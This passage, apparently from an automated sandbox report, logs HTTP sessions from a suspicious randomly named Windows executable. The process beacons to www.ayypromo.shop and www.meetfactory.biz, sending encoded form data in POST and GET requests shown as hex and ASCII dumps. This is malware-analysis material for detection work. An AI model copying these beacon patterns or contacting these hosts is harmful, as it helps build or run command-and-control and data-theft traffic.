3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49711	176.57.64.102	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:57:12.777146101 CEST	818	OUT	POST /6ocx/ HTTP/1.1 Host: www.ayypromo.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 239 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.ayypromo.shop Referer: http://www.ayypromo.shop/6ocx/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 73 67 4c 4f 4e 44 71 4e 4a 6b 54 64 52 54 51 68 42 73 50 5a 61 68 54 5a 76 46 74 54 41 69 50 61 71 6b 33 33 70 42 31 6e 63 6f 36 61 72 30 44 71 4f 34 57 49 78 78 6d 50 41 4a 66 56 66 4d 48 43 58 45 43 6b 52 4c 68 55 42 38 71 33 45 78 73 41 48 65 6b 45 72 47 65 73 46 38 2b 35 4c 52 55 2b 63 6e 48 54 54 48 44 77 6c 74 57 32 4d 35 6f 51 4e 49 4b 47 4b 36 59 4c 64 36 72 33 4b 67 63 65 5a 6a 7a 57 44 33 6e 70 65 2b 55 47 38 5a 61 71 7a 6a 65 6a 36 4b 77 45 2b 43 64 4d 7a 71 53 47 33 37 76 31 41 6f 36 73 68 6e 30 78 42 75 4e 52 75 55 48 67 7a 37 75 4a 35 42 7a 67 4d 79 4b 47 39 54 39 48 32 64 2b 33 74 34 4a 6f 34 62 76 59 69 61 50 57 44 4c 6a 61 4b 34 70 6f 76 72 34 4d 4c 4b 63 67 75 4a 30 3d Data Ascii: wLTtn0=sgLONDqNJkTdRTQhBsPZahTZvFtTAiPaqk33pB1nco6ar0DqO4WIxxmPAJfVfMHCXECkRLhUB8q3ExsAHekErGesF8+5LRU+cnHTTHDwltW2M5oQNIKGK6YLd6r3KgceZjzWD3npe+UG8Zaqzjej6KwE+CdMzqSG37v1Ao6shn0xBuNRuUHgz7uJ5BzgMyKG9T9H2d+3t4Jo4bvYiaPWDLjaK4povr4MLKcguJ0=
Aug 6, 2024 07:57:13.439352036 CEST	749	IN	HTTP/1.1 404 Not Found Server: ddos-guard Connection: close Set-Cookie: __ddg1_=JaW3ckuFKJJD1niqv9DW; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 06-Aug-2025 05:57:13 GMT Date: Tue, 06 Aug 2024 05:57:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 340 Last-Modified: Tue, 29 May 2018 17:41:27 GMT ETag: "154-56d5bbe607fc0" Accept-Ranges: bytes X-Frame-Options: SAMEORIGIN Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49712	176.57.64.102	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:57:15.325762987 CEST	1831	OUT	POST /6ocx/ HTTP/1.1 Host: www.ayypromo.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 1251 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.ayypromo.shop Referer: http://www.ayypromo.shop/6ocx/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 73 67 4c 4f 4e 44 71 4e 4a 6b 54 64 52 54 51 68 42 73 50 5a 61 68 54 5a 76 46 74 54 41 69 50 61 71 6b 33 33 70 42 31 6e 63 72 61 61 72 47 4c 71 4f 62 4f 49 79 78 6d 50 49 70 66 51 66 4d 48 66 58 45 61 67 52 4c 63 6a 42 2f 43 33 45 58 67 41 4d 4d 63 45 6c 47 65 73 4c 73 2b 38 46 78 55 72 63 6e 33 66 54 48 54 77 6c 74 57 32 4d 37 67 51 45 35 4b 47 5a 4b 59 49 59 36 72 37 4f 67 64 4c 5a 6a 72 47 44 33 69 63 64 50 30 47 38 39 32 71 31 51 32 6a 6c 36 77 47 79 69 64 75 7a 71 65 5a 33 37 79 4f 41 6f 2b 57 68 6b 6b 78 41 70 77 67 33 6d 50 77 75 71 65 53 78 7a 2f 38 61 68 54 36 30 79 63 2f 78 76 32 35 6a 36 41 55 2b 39 43 52 6d 61 47 69 52 70 44 34 46 37 46 75 38 62 41 49 61 50 41 30 33 38 6a 33 59 6b 77 6f 45 55 66 6b 2b 73 72 48 75 75 71 39 76 72 4c 46 4d 57 6e 4a 49 51 5a 69 79 71 30 54 4c 49 4c 58 74 66 5a 46 5a 61 55 7a 4c 33 68 6b 35 43 4d 76 63 35 76 51 7a 78 6d 73 57 66 55 62 6a 44 50 79 47 72 68 70 67 2f 75 49 7a 59 6e 74 30 6a 79 41 52 74 76 7a 63 4d 4c 50 2b 6e 71 56 36 41 32 [TRUNCATED] Data Ascii: wLTtn0=sgLONDqNJkTdRTQhBsPZahTZvFtTAiPaqk33pB1ncraarGLqObOIyxmPIpfQfMHfXEagRLcjB/C3EXgAMMcElGesLs+8FxUrcn3fTHTwltW2M7gQE5KGZKYIY6r7OgdLZjrGD3icdP0G892q1Q2jl6wGyiduzqeZ37yOAo+WhkkxApwg3mPwuqeSxz/8ahT60yc/xv25j6AU+9CRmaGiRpD4F7Fu8bAIaPA038j3YkwoEUfk+srHuuq9vrLFMWnJIQZiyq0TLILXtfZFZaUzL3hk5CMvc5vQzxmsWfUbjDPyGrhpg/uIzYnt0jyARtvzcMLP+nqV6A2FimvDoco3Q4oWk/nhIvV9wRsYE3Y7o4zwjRH7gq58N5l1ZuoE4L62O2ixnGa8N4/H6GRYb2xzPK6Hr3hi41bG73bmFQVKILQ6D0noKC5GF7TiXaUwum45GQTh565l+abMJJaWh/LzqaKOjE6Oi6BcKDHMo7ulBqqnqWdft6CL9V/edSOAXb1iZjmcGjRqeTPSdDjXxMWoDi3CQSYxH/7mlb9WTqYS2+M++jrHXIsAHuP3Zb32eoFkN7E/z8Lq5/nXwMLFF9in+0xVIiH79zFnQo7OZBkcD44cqWgttDbksamBEEjXIH/xqVkWoIvyXrgaYdugjjvNwZM06SCiQxXdkwWUxZzngHO1pQNa6D/qsKeSN4/I/93EgrIkKHyu/aC/bsroa6oBnH43FvzT5jI/s+a1PM1KHquY83e4SuFJ9XKpUB9Hd8MDHUbpr5DzoXQSMqgmvfifr1ro8jNhuhrhKbwryySk17l9WQqCjZyu017CG0Krn73iA+u3dYqx9+Nxmikxfsp9QHRrHeAfot0megXNrTT5k6KA8FmQ4dEAhahkAf5iGNHX/qfpqRl8fSAsZW1So6ZW33bC2X/1SQzcGcp8Lyb37sFsZmTL+rAZwRZgF1aX4n/iE3ALfi+UbKly4F8kYqdZpqbLmf1g4+wt5yNbpkuoJUVLe [TRUNCATED]
Aug 6, 2024 07:57:15.964762926 CEST	749	IN	HTTP/1.1 404 Not Found Server: ddos-guard Connection: close Set-Cookie: __ddg1_=frSk9WypOjQSJnKbsh9q; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 06-Aug-2025 05:57:15 GMT Date: Tue, 06 Aug 2024 05:57:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 340 Last-Modified: Tue, 29 May 2018 17:41:27 GMT ETag: "154-56d5bbe607fc0" Accept-Ranges: bytes X-Frame-Options: SAMEORIGIN Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49714	176.57.64.102	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:57:17.869453907 CEST	537	OUT	GET /6ocx/?wLTtn0=hijuOzLOQlrNWhILDNjeC2OH6zMrFQvwuW3+4wEUbqCXhGLxNrCetU+rFrrSd83NXlirQtkmZIjYEy1tPN82iVSiaciSCzMEBxKMdwnmzNSLD956QarfOOVQaIraEhcGUwHoQWWdHKAj&K4G=Thy4J4VXH8ud HTTP/1.1 Host: www.ayypromo.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Aug 6, 2024 07:57:18.624999046 CEST	1147	IN	HTTP/1.1 404 Not Found Server: ddos-guard Connection: close Set-Cookie: __ddg1_=IuyD5aIo8TgKNHFB2ghq; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 06-Aug-2025 05:57:18 GMT Date: Tue, 06 Aug 2024 05:57:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 738 Last-Modified: Sun, 11 Jun 2023 21:19:31 GMT ETag: "2e2-5fde1286ba692" Accept-Ranges: bytes X-Frame-Options: SAMEORIGIN Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED] Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href="http://tilda.cc"> <img src="http://tilda.ws/img/logo404.png" border="0" width="120" height="88" alt="Tilda" /> </a> <br> <br> <br> <br> <b>404 Page not found</b> </td> </tr> </table> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49715	45.33.30.197	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:57:23.968441963 CEST	804	OUT	POST /m6nq/ HTTP/1.1 Host: www.meetfactory.biz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 219 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.meetfactory.biz Referer: http://www.meetfactory.biz/m6nq/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 2b 64 32 65 2f 52 7a 6d 47 6e 74 33 77 46 39 48 72 4b 4a 57 6e 39 73 6b 52 39 53 58 50 42 42 77 73 65 47 6e 43 43 78 45 4e 2b 46 46 39 4c 4a 51 57 2f 62 69 55 48 54 2f 6d 37 4c 45 67 59 75 51 41 30 59 74 66 32 4e 63 45 78 59 6b 41 66 53 79 41 47 75 73 45 48 35 5a 35 4e 77 43 51 78 4d 6c 6f 55 32 39 6f 4f 38 4c 55 67 30 4c 4e 57 35 5a 38 36 46 43 48 39 51 49 36 71 56 71 65 34 57 39 33 42 36 6c 68 68 48 76 5a 41 76 47 50 6e 30 2b 6a 72 36 2b 59 63 48 32 52 45 48 54 48 78 75 61 55 45 57 68 46 49 61 61 6d 74 65 64 57 31 62 51 7a 4a 71 58 71 4a 79 34 53 75 77 56 32 37 34 6c 6a 69 44 56 4a 51 31 53 39 34 50 75 6f 6b 65 68 47 77 3d 3d Data Ascii: wLTtn0=+d2e/RzmGnt3wF9HrKJWn9skR9SXPBBwseGnCCxEN+FF9LJQW/biUHT/m7LEgYuQA0Ytf2NcExYkAfSyAGusEH5Z5NwCQxMloU29oO8LUg0LNW5Z86FCH9QI6qVqe4W93B6lhhHvZAvGPn0+jr6+YcH2REHTHxuaUEWhFIaamtedW1bQzJqXqJy4SuwV274ljiDVJQ1S94PuokehGw==
Aug 6, 2024 07:57:24.473535061 CEST	815	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Tue, 06 Aug 2024 05:57:24 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 46 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 54 4d 73 9b 30 10 bd e7 57 50 0e 99 76 26 e6 db 89 dd 40 3a a9 6b 13 08 b5 d3 d4 09 86 4b 46 48 8a 51 22 24 02 b2 b1 d3 e9 7f 2f e0 4c 4c c7 bd 54 07 a4 5d 76 f7 ed 7b 0b b2 3f 7c 9b 8d e6 d1 cd 58 4a 45 46 2f 8e ec 66 93 28 60 4b 47 c6 4c be 38 92 ea 65 a7 18 a0 dd b1 35 33 2c 80 04 53 50 94 58 38 f2 dd 7c d2 1b bc 45 ee 5f a7 42 e4 3d fc b2 22 6b 47 de f4 56 a0 07 79 96 03 41 12 8a 65 09 72 26 30 ab 73 bd b1 83 d1 12 1f 64 33 90 61 47 5e 13 5c e5 bc 10 9d 84 8a 20 91 3a 08 af 09 c4 bd d6 38 91 08 23 82 00 da 2b 21 a0 d8 d1 15 ad 5b 4e 10 41 f1 85 ad ee f6 96 4e db 24 e3 25 2c 48 2e f6 b4 fe dd 7b 81 1f 0b 5c a6 9d 16 b4 f3 55 41 9d 86 df 67 55 ad aa ea 4c 53 32 8c c5 23 80 82 17 5b 25 21 af aa 2c a9 fb ba b6 7a 88 65 b7 12 76 35 3a c4 e9 ff 07 8e ad ee 47 64 27 1c 6d 25 ce 28 07 c8 91 11 7f d8 1d 3f 7e ea ca b2 23 2f 89 6d 5e eb 2c f0 46 a8 4f 60 0d 76 de 4e 5c a3 c9 e3 8a 41 41 38 93 3a a5 a4 5f ef 4a 36 21 cd aa 08 43 bc 52 04 cf 15 ca 61 3d 69 ce [TRUNCATED] Data Ascii: 26FTMs0WPv&@:kKFHQ"$/LLT]v{?\|XJEF/f(`KGL8e53,SPX8\|E_B="kGVyAer&0sd3aG^\ :8#+![NAN$%,H.{\UAgULS2#[%!,zev5:Gd'm%(?~#/m^,FO`vN\AA8:_J6!CRa=if%9@\|Y~T G?3a,K4K7L\xtaLff$lL%>[y,^stu[`LdNmS-1~9&C1`u\|S~8h;#cp_HF^}-A8MKZIXVO_Ocn-<&<',94(D40&U^fx}dY<64S}qzo94G>kT-[\|6$)0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49716	45.33.30.197	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:57:26.522501945 CEST	824	OUT	POST /m6nq/ HTTP/1.1 Host: www.meetfactory.biz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 239 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.meetfactory.biz Referer: http://www.meetfactory.biz/m6nq/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 2b 64 32 65 2f 52 7a 6d 47 6e 74 33 77 6d 6c 48 70 70 68 57 69 64 73 72 50 74 53 58 42 68 42 38 73 65 61 6e 43 44 30 63 4e 4d 68 46 39 70 42 51 56 2b 62 69 5a 6e 54 2f 74 62 4c 64 2b 6f 76 63 41 30 56 53 66 33 78 63 45 78 63 6b 41 64 4b 79 56 6e 75 72 47 58 35 48 30 74 77 41 65 52 4d 6c 6f 55 32 39 6f 4f 70 67 55 67 38 4c 4e 6c 78 5a 39 62 46 42 59 4e 51 4c 74 61 56 71 50 49 57 35 33 42 37 43 68 67 4c 4a 5a 47 7a 47 50 69 49 2b 6a 2b 57 35 54 63 48 30 63 6b 48 47 55 78 6e 69 56 41 54 53 43 37 57 38 72 4d 75 62 58 44 47 79 70 72 6d 37 30 59 4b 44 57 73 55 6a 68 64 6c 51 68 6a 48 4e 45 79 42 7a 69 50 71 45 6c 32 2f 6c 51 41 6b 6b 2f 69 31 58 4b 6d 36 5a 58 6f 36 79 70 39 79 39 4d 43 6b 3d Data Ascii: wLTtn0=+d2e/RzmGnt3wmlHpphWidsrPtSXBhB8seanCD0cNMhF9pBQV+biZnT/tbLd+ovcA0VSf3xcExckAdKyVnurGX5H0twAeRMloU29oOpgUg8LNlxZ9bFBYNQLtaVqPIW53B7ChgLJZGzGPiI+j+W5TcH0ckHGUxniVATSC7W8rMubXDGyprm70YKDWsUjhdlQhjHNEyBziPqEl2/lQAkk/i1XKm6ZXo6yp9y9MCk=
Aug 6, 2024 07:57:27.029304028 CEST	816	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Tue, 06 Aug 2024 05:57:26 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 37 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 54 4d 73 9b 30 10 bd f7 57 50 0e 99 76 a6 36 5f c6 31 0d a4 93 52 9b d8 a1 76 9a 3a c1 70 c9 08 49 31 4a 84 44 40 80 9d 4e ff 7b 31 ce c4 74 dc 4b 75 40 da 65 77 df be b7 20 fb fd b7 85 bb 0c af c7 52 22 52 7a fe ce de 6d 12 05 6c ed c8 98 c9 e7 ef a4 66 d9 09 06 68 7f 6c cd 14 0b 20 c1 04 e4 05 16 8e 7c bb 9c f4 46 af 91 87 d7 89 10 59 0f 3f 97 a4 72 e4 4d af 04 3d c8 d3 0c 08 12 53 2c 4b 90 33 81 59 93 3b 1d 3b 18 ad f1 51 36 03 29 76 e4 8a e0 3a e3 b9 e8 24 d4 04 89 c4 41 b8 22 10 f7 5a e3 93 44 18 11 04 d0 5e 01 01 c5 8e d6 57 bb e5 04 11 14 9f db ca 7e 6f e9 b4 4d 32 5e c0 9c 64 e2 40 eb df bd e7 f8 21 c7 45 d2 69 41 3d 2b 73 ea ec f8 7d 56 94 ba ae 4f d5 7e 8a b1 78 00 50 f0 7c db 8f c9 8b 22 4b ca a1 ae ad 1c 63 d9 ad 84 5d 8d 8e 71 cc ff c0 b1 95 c3 88 ec 98 a3 ad c4 19 e5 00 39 32 e2 f7 fb e3 87 8f 5d 59 f6 e4 25 b1 cd 1a 9d 05 de 08 e5 11 54 60 ef ed c4 ed 34 79 28 19 14 84 33 a9 53 4a fa f5 a6 e4 2e 64 b7 6a c2 10 af fb 82 67 7d ca 61 33 69 [TRUNCATED] Data Ascii: 270TMs0WPv6_1Rv:pI1JD@N{1tKu@ew R"Rzmlfhl \|FY?rM=S,K3Y;;Q6)v:$A"ZD^W~oM2^d@!EiA=+s}VO~xP\|"Kc]q92]Y%T`4y(3SJ.djg}a3iIJr$ T=YgvX4$Nu`WU4ROHp~uLY1fn;mmjF!f]2?hI`Y%OB}NywZyZ{z,'*7e$"v7Z` V1qPZO_K"WQM(GE :NaqEFcl}wcy&\bodR527V>P%d0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49717	45.33.30.197	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:57:29.074942112 CEST	1837	OUT	POST /m6nq/ HTTP/1.1 Host: www.meetfactory.biz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 1251 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.meetfactory.biz Referer: http://www.meetfactory.biz/m6nq/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 2b 64 32 65 2f 52 7a 6d 47 6e 74 33 77 6d 6c 48 70 70 68 57 69 64 73 72 50 74 53 58 42 68 42 38 73 65 61 6e 43 44 30 63 4e 4d 70 46 38 63 4e 51 57 5a 6e 69 59 6e 54 2f 7a 72 4c 41 2b 6f 75 47 41 33 6c 65 66 33 39 4d 45 7a 55 6b 42 2b 43 79 45 31 57 72 4d 58 35 48 6f 64 77 4e 51 78 4d 77 6f 55 6d 68 6f 4f 35 67 55 67 38 4c 4e 6b 42 5a 30 71 46 42 4c 64 51 49 36 71 55 6c 65 34 57 52 33 46 65 39 68 67 50 2f 5a 31 72 47 49 43 34 2b 68 4d 75 35 65 63 48 36 50 55 47 44 55 78 37 39 56 42 36 70 43 36 53 47 72 50 2b 62 56 48 72 4e 38 4b 58 69 72 2b 4b 36 49 72 67 6e 67 2b 46 52 74 79 2f 53 46 46 52 73 2f 64 4b 47 6f 56 54 6c 62 32 67 6d 67 42 5a 37 42 58 71 37 55 4e 33 75 30 2f 65 44 50 33 79 66 41 75 46 31 6f 78 46 4b 52 4d 61 39 55 61 55 41 6e 76 52 2b 38 75 51 77 32 71 4d 49 43 32 53 59 39 6b 4d 70 64 55 6e 51 66 4f 53 62 4b 41 59 4b 7a 48 44 36 77 67 35 30 78 65 49 6f 58 62 56 30 6a 42 35 66 42 70 77 53 6f 4b 66 55 4f 6a 6f 63 30 66 6c 43 71 62 36 33 51 76 42 6e 6c 56 43 70 2f 74 58 [TRUNCATED] Data Ascii: 